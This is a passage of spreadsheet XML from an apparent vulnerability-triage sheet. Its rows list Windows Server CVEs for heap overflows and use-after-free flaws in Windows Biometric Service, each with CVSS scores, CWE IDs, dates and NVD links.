        <v>7.8</v>
      </c>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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4" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q184" s="5" t="inlineStr"/>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-416</t>
        </is>
      </c>
      <c r="S184" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83968</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83969</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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5" s="5" t="inlineStr"/>
      <c r="M185" s="5" t="inlineStr"/>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q185" s="5" t="inlineStr"/>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S185" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83969</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83970</t>
        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K18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6" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q186" s="5" t="inlineStr"/>
      <c r="R186" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S186" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83970</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83971</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K18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7" s="5" t="inlineStr"/>
      <c r="M187" s="5" t="inlineStr"/>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q187" s="5" t="inlineStr"/>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S187" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83971</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83972</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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8" s="5" t="inlineStr"/>
      <c r="M188" s="5" t="inlineStr"/>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q188" s="5" t="inlineStr"/>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S188" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83972</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83973</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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9" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q189" s="5" t="inlineStr"/>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S189" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83973</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83974</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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0" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q190" s="5" t="inlineStr"/>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S190" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83974</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83975</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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1" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q191" s="5" t="inlineStr"/>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S191" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83975</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83976</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K19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2" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q192" s="5" t="inlineStr"/>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S192" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83976</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83977</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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3" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q193" s="5" t="inlineStr"/>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S193" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83977</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83978</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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4" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q194" s="5" t="inlineStr"/>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S194" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83978</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83979</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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5" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q195" s="5" t="inlineStr"/>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S195" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83979</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83980</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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6" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q196" s="5" t="inlineStr"/>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S196" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83980</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83981</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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7" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q197" s="5" t="inlineStr"/>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S197" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83981</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83982</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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8" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q198" s="5" t="inlineStr"/>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S198" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83982</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83983</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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9" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q199" s="5" t="inlineStr"/>
      <c r="R199" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S199" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83983</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83985</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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0" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q200" s="5" t="inlineStr"/>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S200" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83985</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83986</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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1" s="5" t="inlineStr"/>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q201" s="5" t="inlineStr"/>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
